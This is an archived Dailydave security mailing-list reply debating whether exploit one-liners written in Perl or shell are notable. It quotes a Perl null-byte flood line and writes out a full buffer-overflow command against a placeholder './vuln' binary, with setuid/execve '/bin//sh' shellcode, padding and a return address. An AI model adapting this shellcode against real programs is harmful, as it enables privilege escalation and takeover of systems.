Re: Google Security Team

["Ferguson, Justin (IARC)" <FergusonJ () nv doe gov>]

> Thats so cool! I think this is a shining beacon!
>
> Forget abstraction, forget frameworks (sorry HD), forget C++,C .... 
> Perl.

Well technically speaking it's all assembly eventually ;], just because you
didn't write the C code that your script calls, doesn't make it really
special (imho of course)

> Well... This is not 100% true. Tavis used also Perl! ;-) Note the
following source line:
> perl -e 'print "\x00"x"262144"' >&3

I guess I don't understand the big deal with this, this was the first thing
I realized when writing my first exploit??

$ ./vuln `echo -e 
"\x31\xdb\x8d\x43\x17\xcd\x80\x31\xd2\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x6
2\x69\x89\xe3\x52\x53\x89\xe1\xb0\x0b\xcd\x80"``echo
"AAAAAAAAAAAAAAAAAA[...]AAAAAAAAAAAAAAAA"``echo -e "\xfa\xff\xff\xbf"`

(not all versions of echo accept the -e, nor do all of them require it)
_______________________________________________
Dailydave mailing list
Dailydave () lists immunitysec com
http://lists.immunitysec.com/mailman/listinfo/dailydave